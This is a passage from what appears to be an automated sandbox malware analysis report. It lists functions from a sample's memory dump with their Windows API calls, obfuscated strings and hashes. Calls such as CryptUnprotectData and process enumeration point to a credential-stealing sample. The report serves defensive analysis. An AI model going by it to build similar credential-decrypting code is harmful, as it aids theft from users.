                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #Kk$,jW7$1&?~$33Od${m3$bw
                                    • API String ID: 0-2654596649
                                    • Opcode ID: 629fa57fcffca4e1a1db70583a2a272b055a9ec96e2d6780a176c1a2fec0fbe4
                                    • Instruction ID: c03cd67bc29041cea9b8ac1b66e298bac007b5c24c591132365c95c7c775b85f
                                    • Opcode Fuzzy Hash: 629fa57fcffca4e1a1db70583a2a272b055a9ec96e2d6780a176c1a2fec0fbe4
                                    • Instruction Fuzzy Hash: DAB205F360C200AFE308AE2DEC8567AFBE5EF94720F1A493DE6C583744E67558148697
                                    Function 00F82C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82C42
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82C49
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00F82C58
                                    • wsprintfA.USER32 ref: 00F82C83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: d05c60274c5dec322bccf53bf11579c6cb00202229b6740af04caee371916cf3
                                    • Instruction ID: 63997d545dfd52025d3610f95af7b9bebf4be639f94178e6c2a543e06245ca08
                                    • Opcode Fuzzy Hash: d05c60274c5dec322bccf53bf11579c6cb00202229b6740af04caee371916cf3
                                    • Instruction Fuzzy Hash: 3601F7B1A00608ABDB2C9B58DC4ABA9B76DEB85721F04432DF935DB2C0D774590087D2
                                    Function 01325FEE Relevance: 7.9, Strings: 5, Instructions: 1656COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .h6$Q4C}$YJd@$3[V$Yk
                                    • API String ID: 0-1004772429
                                    • Opcode ID: 709578786d961a32dd514578bbb724cffcfb92265552ffdc929fa75c211003c4
                                    • Instruction ID: 74c8f47015d0fb021ac41e5c6094dfbe1c5f212c97e4dcd074a44da52cf27483
                                    • Opcode Fuzzy Hash: 709578786d961a32dd514578bbb724cffcfb92265552ffdc929fa75c211003c4
                                    • Instruction Fuzzy Hash: 00B23AF3A082049FE304AE2DEC8567AF7E9EFD4720F1A893DE6C4C7744E53598058696
                                    Function 0131A49E Relevance: 7.9, Strings: 5, Instructions: 1655COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$J*G$iy{w$ygj_$I}
                                    • API String ID: 0-1111068510
                                    • Opcode ID: 7bd8156a4d7da056673f3b86cb25abeb260406d80d7710d4f657c007b96aa322
                                    • Instruction ID: 8ac0e9b12e348dcbba46dc010e23a6e9b02254c869d51e38b4db4e37cba933cc
                                    • Opcode Fuzzy Hash: 7bd8156a4d7da056673f3b86cb25abeb260406d80d7710d4f657c007b96aa322
                                    • Instruction Fuzzy Hash: C4B208F360C2009FE304AE2DEC8567AFBE6EF94720F1A493DE6C5C7744E63598058696
                                    Function 00F67750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6775E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F67765
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F6778D
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00F677AD
                                    • LocalFree.KERNEL32(?), ref: 00F677B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 35f1aa9eb9507d269e93047e7c9596d001c099a0153cf27a46e30f842594bc2a
                                    • Instruction ID: cb5ee47fdae7f8598471640428392f7f891e01959103e1781c47e09a991ee323
                                    • Opcode Fuzzy Hash: 35f1aa9eb9507d269e93047e7c9596d001c099a0153cf27a46e30f842594bc2a
                                    • Instruction Fuzzy Hash: 9A017575B403087FEB14DA94DC0AFAA777CEB44B14F004158FB28EB2C0D6B09940C790
                                    Function 0131704E Relevance: 6.6, Strings: 4, Instructions: 1579COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &+V_$>lX$sg_$3Ju
                                    • API String ID: 0-3780354508
                                    • Opcode ID: 745e04d2ce4acf4a2e196db80d90fc194cc8c7e1e0d621c6f12c72a5069d0cb6
                                    • Instruction ID: 65c5173bdbe260429bf01050fd4118cb74094909aa7c7602247703b290a9aa01
                                    • Opcode Fuzzy Hash: 745e04d2ce4acf4a2e196db80d90fc194cc8c7e1e0d621c6f12c72a5069d0cb6
                                    • Instruction Fuzzy Hash: E6B225F3A086049FE3046E2DEC8567AFBE9EFD4720F16493DEAC4C7744EA3558058692
                                    Function 0131DC75 Relevance: 6.4, Strings: 4, Instructions: 1414COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /0\U$@CM_$ftT{$qL4|
                                    • API String ID: 0-742752915
                                    • Opcode ID: 6af1be2171514f30faa8361909d42f3a5f6d7567c251a1b6b4e178e780014cb6
                                    • Instruction ID: 82266f5badea7966efe8d4857ece81404c2c101986c9094ffc5cc0bc6fb97800
                                    • Opcode Fuzzy Hash: 6af1be2171514f30faa8361909d42f3a5f6d7567c251a1b6b4e178e780014cb6
                                    • Instruction Fuzzy Hash: 22A2E4F3A0C204AFE7046F29EC8567AFBE5EF94720F16492DE6C483744E63558058B97
                                    Function 00F83A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F83A96
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F83AA9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F83ABF
                                      • Part of subcall function 00F87310: lstrlen.KERNEL32(------,00F65BEB), ref: 00F8731B
                                      • Part of subcall function 00F87310: lstrcpy.KERNEL32(00000000), ref: 00F8733F
                                      • Part of subcall function 00F87310: lstrcat.KERNEL32(?,------), ref: 00F87349
                                      • Part of subcall function 00F87280: lstrcpy.KERNEL32(00000000), ref: 00F872AE
                                    • CloseHandle.KERNEL32(00000000), ref: 00F83BF7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: a010f0a44bc749c8f30944cf5d1885dbccc9fc4c1255aa04568aeb29a854150d
                                    • Instruction ID: 39fc45ca2b447e06791ef0c9fddf150c60d4fc6c9099a675f591ae38b547d5cd
                                    • Opcode Fuzzy Hash: a010f0a44bc749c8f30944cf5d1885dbccc9fc4c1255aa04568aeb29a854150d
                                    • Instruction Fuzzy Hash: 2481F570901208CFD728EF18C848B95B7E1FB85728F29C1ADD4189B2B2D3769D82DF80
                                    Function 00F6EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00F6EA76
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00F6EA7E
                                    • lstrcat.KERNEL32(00F8CFEC,00F8CFEC), ref: 00F6EB27
                                    • lstrcat.KERNEL32(00F8CFEC,00F8CFEC), ref: 00F6EB49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: fa1d216a7adc59f59d21981478ef98816773e095ad93a230fcd3ea48e414e6a6
                                    • Instruction ID: c55528187c85fa9b543c7789ba8f7ab267287e7c2de1b8946da8f7c848bd9800
                                    • Opcode Fuzzy Hash: fa1d216a7adc59f59d21981478ef98816773e095ad93a230fcd3ea48e414e6a6
                                    • Instruction Fuzzy Hash: 26312376A00118ABEB209B48EC45FEEB77DDF84304F044079FA18E6240D7B05A048BB2
                                    Function 00F840B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00F840CD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00F840DC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F840E3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00F84113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: a5a34135b2a3cdaae36d2b34cda39a23a74923f92cfabe2b200478fd5cc0912e
                                    • Instruction ID: e5053d4aafdf6848fe0e17a27ca11c69d5ef2cc55becd02dfda50518e4769046
                                    • Opcode Fuzzy Hash: a5a34135b2a3cdaae36d2b34cda39a23a74923f92cfabe2b200478fd5cc0912e
                                    • Instruction Fuzzy Hash: F0012170600209BBDB24DFA5DC55BAB7BADEF45311F108169FD19C7340DA71E980DB54
                                    Function 00F82B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00F8A3D0,000000FF), ref: 00F82B8F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00F82B96
                                    • GetLocalTime.KERNEL32(?,?,00000000,00F8A3D0,000000FF), ref: 00F82BA2
                                    • wsprintfA.USER32 ref: 00F82BCE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
